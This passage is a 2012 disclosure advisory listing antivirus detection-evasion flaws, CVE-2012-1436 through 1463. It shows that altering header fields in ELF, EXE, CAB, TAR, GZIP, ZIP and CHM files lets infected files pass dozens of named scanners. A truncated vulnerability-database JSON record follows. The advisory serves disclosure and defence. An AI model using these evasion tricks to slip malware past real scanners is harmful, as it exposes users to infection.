Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1436

  1. Specially crafted infected MS Office files with "\50\4B\53\70\58" at offset 526 evades detection.

Affected products - Comodo 7425

CVE no - CVE-2012-1437

  1. Specially crafted infected MS Office files with "ustar" at offset 257 evades detection.

Affected products - Comodo 7425, Sophos 4.61.0

CVE no - CVE-2012-1438

  1. 'padding' field in ELF files is parsed incorrectly. If an infected ELF file's padding field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1439

  1. 'identsize' field in ELF files is parsed incorrectly. If an infected ELF file's identsize field is incremented by 1 it evades detection.

Affected products - Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1440

  1. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.
    If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.

Affected products - Prevx 3.0

'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc', 'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and 'e_oemid' fields in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Prevx 3.0

CVE no - CVE-2012-1441

  1. 'class' field in ELF files is parsed incorrectly.
    If an infected ELF file's class field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1442

  1. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the user and correctly extracted. Such a file evades detection.

Affected products - ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, VirusBuster 13.6.151.0, Fortinet 4.2.254.0, Antiy-AVL 2.0.3.7, K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, Jiangmin 13.0.900, Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0, nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, Avast5 5.0.677.0, VBA32 3.12.14.2

CVE no - CVE-2012-1443

  1. 'abiversion' field in ELF files is parsed incorrectly.
    If an infected ELF file's abiversion field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1444

  1. 'abi' field in ELF files is parsed incorrectly.
    If an infected ELF file's abi field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1445

  1. 'encoding' field in ELF files is parsed incorrectly.
    If an infected ELF file's encoding field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, Symantec 20101.3.0.103, Norman 6.06.12, eSafe 7.0.017.0, Kaspersky 7.0.0.125, McAfee-GW-Edition 2010.1C, Sophos 4.61.0, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, PCTools 7.0.3.5, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1446

  1. 'e_version' field in ELF files is parsed incorrectly.
    If an infected ELF file's e_version field is incremented by 1 it evades detection.

Affected products - Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7

CVE no - CVE-2012-1447

  1. 'cbCabinet' field in CAB files is parsed incorrectly.
    If an infected CAB file's cbCabinet field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0, TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1

CVE no - CVE-2012-1448

  1. 'vMajor' field in CAB files is parsed incorrectly.
    If an infected CAB file's vMajor field is incremented by 1 it evades detection.

Affected products - NOD32 5795, Rising 22.83.00.03

CVE no - CVE-2012-1449

  1. 'reserved3' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved3 field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0

CVE no - CVE-2012-1450

  1. 'reserved2' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved2 field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0

CVE no - CVE-2012-1451

  1. 'reserved1' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved1 field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00

CVE no - CVE-2012-1452

  1. 'coffFiles' field in CAB files is parsed incorrectly.
    If an infected CAB file's coffFiles field is incremented by 1 it evades detection.

Affected products - McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C, Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402, Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1453

  1. 'ei_version' field in ELF files is parsed incorrectly.
    If an infected ELF file's ei_version field is incremented by 1 it evades detection.

Affected products - McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1454

  1. 'vMinor' field in CAB files is parsed incorrectly.
    If an infected CAB file's vMinor field is incremented by 1 it evades detection.

Affected products - NOD32 5795, Rising 22.83.00.03

CVE no - CVE-2012-1455

  1. A specially crafted ZIP file, created by concatenating the contents of a clean TAR archive and a virus-infected ZIP archive, is parsed incorrectly and evades detection.

Affected products - AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004

CVE no - CVE-2012-1456

  1. If a file containing the EICAR test virus is placed in a TAR archive and the length field in that file's header is set to be greater than the archive's total length (1,000,000+original length in our experiments), the antivirus declares the file to be clean but the virus gets extracted correctly by the GNU tar program.

Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0

CVE no - CVE-2012-1457

  1. A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header.

If an infected CHM file's header is modified so that the reset interval is lower than in the original file, the antivirus declares the file to be clean. But the Windows CHM viewer hh.exe correctly decompresses the infected content located before the tampered header.

Affected products - ClamAV 0.96.4, Sophos 4.61.0

CVE no - CVE-2012-1458

  1. In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. Every header also contains a file length field, which is used by the extractor to locate the next header in the archive.

If a TAR archive contains two files, the first one clean and the second infected with the EICAR test virus, and the archive is modified so that the length field in the header of the first, clean file points into the middle of the header of the second, infected file, the antivirus declares the file to be clean but the virus gets extracted correctly by the GNU tar program. If 6 random bytes are appended to the end of an infected tar.gz archive, the antivirus declares the file to be clean but the virus gets extracted correctly by the gunzip+tar programs, which ignore these bytes.

Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, VBA32 3.12.14.2

CVE no - CVE-2012-1460

  1. GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. If an infected .tar.gz file is broken into two streams, the antivirus declares the infected .tar.gz file to be clean while tar+gunzip extract the virus correctly.

Affected products - AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, F-Secure 9.0.16160.0, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2

CVE no - CVE-2012-1461

  1. If 1024 random bytes are prepended to an infected ZIP archive, the antivirus declares the file to be clean but the virus gets extracted correctly by the unzip program, which skips these bytes.

Affected products - AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, Symantec 20101.3.0.103

CVE no - CVE-2012-1462

  1. In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for big-endian. The Linux kernel, however, does not check this field before loading an ELF file. If an infected ELF file's 5th byte is set to 02, the antivirus declares the file to be clean but the ELF file gets executed correctly.

Affected products - AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7

CVE no - CVE-2012-1463

Credits

Vulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov.

References

"Abusing File Processing in Malware Detectors for Fun and Profit" by Suman Jana and Vitaly Shmatikov. To appear in IEEE Symposium on Security and Privacy 2012: http://www.ieee-security.org/TC/SP2012/



{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0367",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "antivirus",
            scope: "eq",
            trust: 2.1,
            vendor: "comodo",
            version: "7424",
         },
         {
            model: "avl sdk",
            scope: "eq",
            trust: 1.8,
            vendor: "antiy",
            version: "2.0.3.7",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "authentium",
            version: "5.2.11.5",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "avg",
            version: "10.0.0.1190",
         },
         {
            model: "bitdefender",
            scope: "eq",
            trust: 1.8,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "clamav",
            scope: "eq",
            trust: 1.8,
            vendor: "clamav",
            version: "0.96.4",
         },
         {
            model: "anti-malware",
            scope: "eq",
            trust: 1.8,
            vendor: "emsisoft",
            version: "5.1.0.1",
         },
         {
            model: "virus utilities t3 command line scanner",
            scope: "eq",
            trust: 1.8,
            vendor: "ikarus",
            version: "1.1.97.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "pc tools",
            version: "7.0.3.5",
         },
         {
            model: "virusbuster",
            scope: "eq",
            trust: 1.8,
            vendor: "virusbuster",
            version: "13.6.151.0",
         },
         {
            model: "esafe",
            scope: "eq",
            trust: 1.8,
            vendor: "aladdin",
            version: "7.0.17.0",
         },
         {
            model: "f-secure anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "f secure",
            version: "9.0.16160.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "kaspersky",
            version: "7.0.0.125",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "sophos",
            version: "4.61.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "fortinet",
            version: "4.2.254.0",
         },
         {
            model: "security essentials",
            scope: "eq",
            trust: 1.8,
            vendor: "microsoft",
            version: "2.0",
         },
         {
            model: "scan engine",
            scope: "eq",
            trust: 1.8,
            vendor: "mcafee",
            version: "5.400.0.1158",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 1.6,
            vendor: "symantec",
            version: "11.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "rising global",
            version: "22.83.00.03",
         },
         {
            model: "v3 internet security",
            scope: "eq",
            trust: 1,
            vendor: "ahnlab",
            version: "2011.01.18.00",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "5.0.677.0",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "nprotect",
            version: "2011-01-17.01",
         },
         {
            model: "nod32 antivirus",
            scope: "eq",
            trust: 1,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "g data antivirus",
            scope: "eq",
            trust: 1,
            vendor: "gdata",
            version: "21",
         },
         {
            model: "trend micro antivirus",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 1,
            vendor: "f prot",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "k7computing",
            version: "9.77.3565",
         },
         {
            model: "quick heal",
            scope: "eq",
            trust: 1,
            vendor: "cat",
            version: "11.00",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 1,
            vendor: "anti virus",
            version: "3.12.14.2",
         },
         {
            model: "gateway",
            scope: "eq",
            trust: 1,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "4.8.1351.0",
         },
         {
            model: "antivirus \\& antispyware",
            scope: "eq",
            trust: 1,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "panda antivirus",
            scope: "eq",
            trust: 1,
            vendor: "pandasecurity",
            version: "10.0.2.7",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "4.8.1351.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "5.0.677.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "rising",
            version: "22.83.00.03",
         },
         {
            model: "nod32 anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "frisk",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "g data",
            version: "21",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "k7 computing",
            version: "9.77.3565",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "nprotect",
            version: "2011-01-17.01",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "panda security",
            version: "10.0.2.7",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.8,
            vendor: "virusblokada",
            version: "3.12.14.2",
         },
         {
            model: "v3 internet security",
            scope: "eq",
            trust: 0.8,
            vendor: "unlab",
            version: "2011.01.18.00",
         },
         {
            model: "heal",
            scope: "eq",
            trust: 0.8,
            vendor: "quick heal k k",
            version: "11.00",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 0.8,
            vendor: "symantec",
            version: "11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "web gateway software",
            scope: "eq",
            trust: 0.8,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.3,
            vendor: "virusblokada",
            version: "3.12.142",
         },
         {
            model: "virusbuster",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "13.6.1510",
         },
         {
            model: "trend micro",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "symantec",
            version: "20101.3103",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.3,
            vendor: "sophos",
            version: "4.61",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "rising",
            version: "22.8303",
         },
         {
            model: "cat-quickheal",
            scope: "eq",
            trust: 0.3,
            vendor: "quick heal",
            version: "11.00",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "pctools",
            version: "7.0.35",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "10.0.27",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "norman",
            version: "6.6.12",
         },
         {
            model: "mcafee-gw-edition 2010.1c",
            scope: null,
            trust: 0.3,
            vendor: "mcafee",
            version: null,
         },
         {
            model: "computing pvt ltd k7antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "k7",
            version: "9.77.3565",
         },
         {
            model: "nprotect",
            scope: "eq",
            trust: 0.3,
            vendor: "inca",
            version: "2011-01-17.01",
         },
         {
            model: "antivirus t3.1.1.97.0",
            scope: null,
            trust: 0.3,
            vendor: "ikarus",
            version: null,
         },
         {
            model: "data software gdata",
            scope: "eq",
            trust: 0.3,
            vendor: "g",
            version: "21",
         },
         {
            model: "software f-prot antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "frisk",
            version: "4.6.2117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "fortinet",
            version: "4.2.2540",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "f secure",
            version: "9.0.16160.0",
         },
         {
            model: "nod32",
            scope: "eq",
            trust: 0.3,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "esafe",
            version: "7.0.170",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "emsisoft",
            version: "5.11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "antivir engine",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "7.11.1163",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.3,
            vendor: "avg",
            version: "10.01190",
         },
         {
            model: "avast5 antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "5.0.6770",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.8.1351.0",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "authentium",
            version: "5.2.115",
         },
         {
            model: "antiy-avl",
            scope: "eq",
            trust: 0.3,
            vendor: "antiy",
            version: "2.0.37",
         },
         {
            model: "engine",
            scope: "eq",
            trust: 0.3,
            vendor: "ahnlab",
            version: "v32011.01.18.00",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ahnlab:v3_internet_security:2011.01.18.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-secure:f-secure_anti-virus:9.0.16160.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:nprotect:nprotect_antivirus:2011-01-17.01:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:comodo:comodo_antivirus:7424:*:*:*:*:*:*:*",
                        cpe_name: [],
